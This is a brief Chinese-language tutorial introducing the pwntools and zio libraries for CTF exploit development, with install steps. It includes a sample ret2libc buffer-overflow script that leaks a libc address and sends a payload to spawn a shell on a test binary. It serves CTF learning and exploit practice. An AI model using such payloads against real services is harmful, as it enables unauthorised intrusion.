1.pwntools
pwntools是一个CTF框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。
pwntools对Ubuntu 12.04和14.04的支持最好,但是绝大多数的功能也支持Debian, Arch, FreeBSD, OSX, 等等。
sudo pip install pwntools即可安装
如果安装过程中提示缺少相应的库,应该都可以很容易的google到解决方法。
安装完成后执行以下命令来检测是否成功:import pwn
>>> pwn.asm("xor eax,eax")
'1\xc0'
如果执行结果和上面相同,则说明安装成功,pwn模块现在可以使用了。
2.zio
pwntools和zio两者均是用python开发的exp编写工具,同时方便了远程exp和本地exp的转换 sudo pip install zio
即可安装
zio is an easy-to-use io library for pwning development, supporting an unified interface for local process pwning and TCP socket io.
The primary goal of zio is to provide unified io interface between process stdin/stdout and TCP socket io. So when you have done local pwning development, you only need to change the io target to pwn the remote server.
The following code illustrate the basic idea.
from zio import *
if you_are_debugging_local_server_binary:
io = zio('./buggy-server') # used for local pwning development
elif you_are_pwning_remote_server:
io = zio(('1.2.3.4', 1337)) # used to exploit remote service
io.write(your_awesome_ropchain_or_shellcode)
# hey, we got an interactive shell!
io.interact()
from zio import *
io = zio('./buggy-server')
# io = zio((pwn.server, 1337))
for i in xrange(1337):
io.writeline('add ' + str(i))
io.read_until('>>')
io.write("add TFpdp1gL4Qu4aVCHUF6AY5Gs7WKCoTYzPv49QSa\ninfo " + "A" * 49 + "\nshow\n")
io.read_until('A' * 49)
libc_base = l32(io.read(4)) - 0x1a9960
libc_system = libc_base + 0x3ea70
libc_binsh = libc_base + 0x15fcbf
payload = 'A' * 64 + l32(libc_system) + 'JJJJ' + l32(libc_binsh)
io.write('info ' + payload + "\nshow\nexit\n")
io.read_until(">>")
# We've got a shell;-)
io.interact()